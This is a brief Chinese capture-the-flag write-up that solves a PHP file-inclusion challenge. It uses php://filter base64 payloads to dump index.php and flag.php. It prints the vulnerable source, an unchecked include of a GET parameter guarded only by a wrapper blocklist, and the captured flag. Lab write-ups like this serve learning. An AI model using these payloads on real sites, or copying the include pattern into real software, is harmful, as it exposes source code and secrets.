然后从题目我们知道这个是一个文件包含题,对文件进行php伪协议检测
?file=php://filter/read=convert.base64-encode/resource=index.php 
用工具将伪代码解码就得到文件源码了
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
exit('hacker!');
}
if($file){
include($file);
}else{
echo '<a href="?file=flag.php">tips</a>';
}
?>
input伪协议是被过滤了,我们再用filter伪协议去读取flag.php文件
?file=php://filter?read=convert.base64-encode/resource=flag.php
再用base64工具解码就得到flag了
flag{eba8550a-7871-47ae-b101-232fdb610777}
发表评论 取消回复